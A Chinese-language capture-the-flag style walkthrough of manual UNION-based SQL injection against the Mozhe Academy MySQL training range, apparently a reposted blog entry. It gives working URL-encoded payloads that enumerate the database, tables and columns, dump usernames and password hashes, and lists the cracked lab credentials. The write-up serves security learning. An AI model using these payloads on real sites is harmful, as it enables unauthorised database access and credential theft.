SQL注入——Union注入攻擊——手工注入篇——SQL手工注入漏洞測試(MySQL數據庫)


0x00
我這邊是利用墨者學院的靶場來進行講解
靶場地址:https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe
SQL注入原理相關文章:https://www.cnblogs.com/lingyi888/p/12886483.html

0x01

開啟靶場我們可以看到登錄界面

0x02

我們來尋找一下注入點

利用工具啊D我們可以找到注入點

0x03

可以看到是這樣的界面
下面我們來進行檢測
我直接給出語句就不一步一步截圖了

檢測語句:
and 1=1 返回正常
and 1=2 返回錯誤
order by 4 得到有四個字段數

0x04
利用聯合查詢來查詢回顯位置

id=-1%20union%20select%201,2,3,4
判斷得到

可以知道回顯在 2 3這兩個字段
接下來,構造拼接語句進行查詢

使用回顯位爆出數據庫名和版本

id=-1%20union%20select%201,database(),version(),4

根據數據庫名爆破表名

id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema%20=%20%22mozhe_Discuz_StormGroup%22#

根據表名爆破列名

id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%22StormGroup_member%22%20#

爆列內容

id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member%20#

0x05
這邊可以看到存在兩個賬戶
密碼是md5解密一下就可以得到兩個賬號,其中一個登錄就可以

賬號一:
mozhe
dsan13
賬號二:
mozhe
451866

登錄就可以拿到flag了

ok,今天就到這里,關注我,一起學習哦


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM